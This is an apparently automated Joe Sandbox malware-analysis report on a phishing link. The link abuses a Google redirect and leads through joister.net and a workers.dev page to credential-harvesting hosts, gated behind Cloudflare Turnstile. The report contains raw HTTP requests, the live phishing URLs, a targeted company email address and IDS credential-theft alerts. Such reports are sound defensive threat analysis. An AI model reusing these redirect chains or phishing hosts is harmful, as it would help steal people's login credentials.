Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.google.at/url?sa==ChR6Fb4oMA7qoNPeAF0HryTWGOi&rct=mCcPfNgQLHn7TqSCLwLAghdNeRqdmhaOmrXNGpkofpekJnfvmVMTgxKB7tJBUVJOPR&sa=t&url=amp/joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t

Overview

General Information

Sample URL:https://www.google.at/url?sa==ChR6Fb4oMA7qoNPeAF0HryTWGOi&rct=mCcPfNgQLHn7TqSCLwLAghdNeRqdmhaOmrXNGpkofpekJnfvmVMTgxKB7tJBUVJOPR&sa=t&url=amp/joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2F
Analysis ID:1586350
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
Detected suspicious crossdomain redirect
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 3900 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2916 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1956,i,10359304098874656515,12441451317658416628,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 1856 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.at/url?sa==ChR6Fb4oMA7qoNPeAF0HryTWGOi&rct=mCcPfNgQLHn7TqSCLwLAghdNeRqdmhaOmrXNGpkofpekJnfvmVMTgxKB7tJBUVJOPR&sa=t&url=amp/joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-09T00:45:49.637655+010020573011Successful Credential Theft Detected104.21.32.1443192.168.2.1649722TCP
2025-01-09T00:45:52.732602+010020573011Successful Credential Theft Detected104.21.32.1443192.168.2.1649723TCP
2025-01-09T00:45:53.866539+010020573011Successful Credential Theft Detected104.21.64.1443192.168.2.1649735TCP

Click to jump to signature section

Show All Signature Results
Source: chromecache_60.1.drBinary or memory string: const PUBLIC_KEY = `-----BEGIN PUBLIC KEY-----memstr_b1c013e2-6
Source: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/?email=info@acaglobal.comHTTP Parser: No favicon
Source: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/?email=info@acaglobal.comHTTP Parser: No favicon

Networking

barindex
Source: Network trafficSuricata IDS: 2057301 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page with Explicit Cloudflare Turnstile Rendering 2024-11-07 : 104.21.32.1:443 -> 192.168.2.16:49722
Source: Network trafficSuricata IDS: 2057301 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page with Explicit Cloudflare Turnstile Rendering 2024-11-07 : 104.21.32.1:443 -> 192.168.2.16:49723
Source: Network trafficSuricata IDS: 2057301 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page with Explicit Cloudflare Turnstile Rendering 2024-11-07 : 104.21.64.1:443 -> 192.168.2.16:49735
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.google.at to http://joister.net/tt/ttt/nndmpadn5vftnmu2pff1y4kbkrm/aw5mb0bhy2fnbg9iywwuy29t
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.40
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.40
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.40
Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.40
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /url?sa==ChR6Fb4oMA7qoNPeAF0HryTWGOi&rct=mCcPfNgQLHn7TqSCLwLAghdNeRqdmhaOmrXNGpkofpekJnfvmVMTgxKB7tJBUVJOPR&sa=t&url=amp/joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t HTTP/1.1Host: www.google.atConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQi5ys0BCMfRzQEIidPNAQjc080BCMvWzQEI9NbNAQiK180BCKfYzQEI+cDUFRi60s0BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /amp/joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t HTTP/1.1Host: www.google.atConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQi5ys0BCMfRzQEIidPNAQjc080BCMvWzQEI9NbNAQiK180BCKfYzQEI+cDUFRi60s0BGMvYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=520=kQ1SKOZBlu5U9g9uH4DWl7AAwPtgBfVRWwdNkyUQMn_8hYl5hBgM9G8KKcL60IkzNEUUfoh-Ofgk-L8vMOdi9NPLrAhPccPFqTB_uRUrPidHYxSp1U9xJzl5kfoKA-sVZE-17MUKtU6pbxgWxWAHZyELTCpmjzZgwenN-xFr6_zxx231res87BkJN_hCWlgDMXMthA
Source: global trafficHTTP traffic detected: GET /tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29t HTTP/1.1Host: joister.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: joister.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://joister.net/tt/ttt/NnDmPaDN5vfTnmu2pfF1Y4Kbkrm/aW5mb0BhY2FnbG9iYWwuY29tAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?email=info@acaglobal.com HTTP/1.1Host: 2c079db7.df34542e8ba91dbfaec98ed5.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://joister.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/sr46z/0x4AAAAAAA4FpD7uVAQN4KLZ/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ff01048fb6d4364&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/sr46z/0x4AAAAAAA4FpD7uVAQN4KLZ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/sr46z/0x4AAAAAAA4FpD7uVAQN4KLZ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 2c079db7.df34542e8ba91dbfaec98ed5.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/?email=info@acaglobal.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8ff01048fb6d4364&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 2c079db7.df34542e8ba91dbfaec98ed5.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/983776855:1736379108:IMxQVsLwXGlZd6n2Z41p0MdEOBPL-IrpzZlTwr2AUq0/8ff01048fb6d4364/R_rTQntoF2VLgYZkDUVyN5HYUuUJHQ5sQpdDYboamyI-1736379951-1.1.1.1-8HJ56pYygoOERHrUddPOUm5UWJPLWIxfd21ZbdJVLTboWU.17jbFjn_jHtL9eDOz HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8ff01048fb6d4364/1736379953254/769054fa8dcecaecb9960e2b63b2bfa4fdb2c1a032f5b46001c82e1ade1b6212/4HoZ_aEiJdqpGNw HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/sr46z/0x4AAAAAAA4FpD7uVAQN4KLZ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ff01048fb6d4364/1736379953255/TqpTBbsANyb-yve HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/sr46z/0x4AAAAAAA4FpD7uVAQN4KLZ/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8ff01048fb6d4364/1736379953255/TqpTBbsANyb-yve HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/983776855:1736379108:IMxQVsLwXGlZd6n2Z41p0MdEOBPL-IrpzZlTwr2AUq0/8ff01048fb6d4364/R_rTQntoF2VLgYZkDUVyN5HYUuUJHQ5sQpdDYboamyI-1736379951-1.1.1.1-8HJ56pYygoOERHrUddPOUm5UWJPLWIxfd21ZbdJVLTboWU.17jbFjn_jHtL9eDOz HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/983776855:1736379108:IMxQVsLwXGlZd6n2Z41p0MdEOBPL-IrpzZlTwr2AUq0/8ff01048fb6d4364/R_rTQntoF2VLgYZkDUVyN5HYUuUJHQ5sQpdDYboamyI-1736379951-1.1.1.1-8HJ56pYygoOERHrUddPOUm5UWJPLWIxfd21ZbdJVLTboWU.17jbFjn_jHtL9eDOz HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?alqrdsrq&qrc=info@acaglobal.com HTTP/1.1Host: moderntoolbc.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"accept: application/jsonqrc-auth: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2Fhc2suY28uY29tLyIsImRvbWFpbiI6ImFhc2suY28uY29tIiwia2V5IjoiMmdpMTU5RWk1UTRuIiwicXJjIjoiaW5mb0BhY2FnbG9iYWwuY29tIiwiaWF0IjoxNzM2Mzc5OTYzLCJleHAiOjE3MzYzODAwODN9.9mfmPJ6Tz293gVpDft9Bh8PbCFN6r0rJETWVrutJxQo HTTP/1.1Host: aask.co.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?alqrdsrq&qrc=info@acaglobal.com HTTP/1.1Host: moderntoolbc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?qrc=info%40acaglobal.com HTTP/1.1Host: aask.co.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://2c079db7.df34542e8ba91dbfaec98ed5.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=2gi159Ei5Q4n; qPdM.sig=jv1uXA6a0I0yiNlNstBvmVMGIMI
Source: global trafficHTTP traffic detected: GET /?alqrdsrq=2c501db8a0abfeaec0044cc37e4ba615f256710ed6b5e6c0c3ac509d713b24ad0c609db15d0c265c77843f8250dae7252fd1caf08944af6274852154f68f1cee&qrc=info%40acaglobal.com HTTP/1.1Host: moderntoolbc.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=b2LP0Q7ttQSa; qPdM.sig=57OkVDslWv_gQHM9EqrpexG1MhM
